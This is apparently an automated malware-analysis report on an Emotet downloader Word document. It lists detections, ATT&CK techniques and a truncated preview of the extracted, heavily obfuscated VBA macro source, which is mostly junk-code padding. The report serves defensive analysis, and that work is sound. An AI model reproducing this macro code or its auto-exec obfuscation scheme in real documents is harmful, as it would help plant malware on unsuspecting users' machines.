MALICIOUS
302
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1140 Deobfuscate/Decode Files or Information
The sample exhibits multiple high and critical heuristic firings indicating obfuscated auto-executing VBA loaders, including GetObject calls and p-code execution. ClamAV detection confirms this is a known Emotet downloader variant. The VBA script, though heavily obfuscated, is characteristic of Emotet's behavior to download and execute a secondary payload.
Heuristics 9
-
ClamAV: Doc.Downloader.Emotet-6863642-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6863642-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 73965 bytes |
SHA-256: f9dc5329a9a7efcc6310c51285741381ffda1277ac02f89c25e60dc85a8b6e00 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "M___9_17"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "R279943"
Function W78754()
b999839 = 964093313 - 790492610
w_615254 = 281843914 + X42__0
Select Case C_____49
Case 281442124
t3_9_7 = Chr(783805656 * Tan(L__9452))
o5_219_ = Z4171_25
Case 998050343
S52_484 = l89_27
o350_9 = i___8_5
Case 561485423
Z4__75 = 901535213
w93680 = q4_90_7
End Select
E_563899 = 618650112 - 570557927
o760_2 = 278204608 + u198_3
Select Case E_43__
Case 849917359
w____0_ = Chr(179104655 * Tan(I94_73_))
l_55768_ = B88_636_
Case 304978203
p570_9 = o1__22
c557__4 = h0_916
Case 594614811
v8_08__ = 765669961
I_7__8_6 = V_2295_
End Select
j__5641 = 968391338 - 434831068
U_73_6_ = 762869376 + t55_5_4
Select Case G13485
Case 869518904
O48_72 = Chr(990636761 * Tan(s_184__))
V724__4 = L7__238
Case 490883433
H_3__865 = p45_97_
W9840__7 = s__729_
Case 203271845
n69100 = 941792175
M0777_ = i82_270
End Select
U_27__4 = 410638304 - 226185383
m1312204 = 372662241 + X5_6101
Select Case q_46__
Case 913580008
o_557_21 = Chr(155339587 * Tan(m5_7_7))
R096062_ = H53079_5
Case 126455408
P1897571 = V249239
S25412_1 = X75__1
Case 670043029
M20__3_3 = 977161649
X6937_ = a8758_62
End Select
b87701 = 642133596 - 410654228
f_5707 = 444905912 + f_736037
Select Case P_035_5_
Case 119073590
H__000 = Chr(194337218 * Tan(b_9348))
E_79867 = n_767528
Case 467876948
c__18_7 = c_____
h8867_ = V_1880
Case 766947059
p6_72__ = 45677177
r39691_ = J42_1_2_
End Select
O62720 = 15140262 - 606241399
J__6_8 = 245115582 + M8_16___
Select Case d8_866_
Case 191090454
r5048_ = Chr(18694950 * Tan(t_206_8))
k94_314 = L813574
Case 168566280
Y80_361_ = U___573_
j1_5_3 = b073_02_
Case 40248200
W24__1 = 435751948
q_473_ = c521_54
End Select
B6_3_863 = 336509501 - 885396307
w__7726 = 251208046 + f_89_2__
Select Case p24_6814
Case 625226632
R4_1_6 = Chr(10001131 * Tan(S3_2__))
c4563_ = l31_229_
Case 902219164
n910__9 = R316___
j262344_ = L8_386_9
Case 517067101
h971882 = 668172797
U4_423 = o7_7932
End Select
Q2_033_ = 891207631 - 763977458
T3_7_2 = 21474711 + f675_61
Select Case Y17891_8
Case 750739630
f__886 = Chr(73082833 * Tan(s68_3__))
u_22151 = f__55_6_
Case 718747528
p6591117 = n22__51
j8_879_8 = V627__7
Case 508001758
A4827_ = 670695557
a864__6 = q_38__4_
End Select
End Function
Function U___648(E00243__, z_33_61)
On Error Resume Next
L771989_ = 969600506 - 164771385
Z599_39_ = 273528226 + S246___8
Select Case t278_5_
Case 622549525
U_03__ = Chr(233002850 * Tan(V065_2))
I_11923 = I13__4
Case 489822154
i720_9 = v_7_96
i__2_079 = I0697_8
Case 562872967
O7_6_53 = 343726147
b05_47_ = v172576
End Select
A767_4_ = 888531924 - 718454726
h_93_39 = 732739377 + K5_513
Select Case Y5_71_73
Case 542682796
A566__2 = Chr(807013324 * Tan(l9403_))
J_1634_ = v___92
Case 194258582
n__7_6_9 = l__15867
K377031 = E815513
Case 835756170
h9874_ = 443881288
T3400_09 = m06_30
End Select
Set t_9903 = G
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.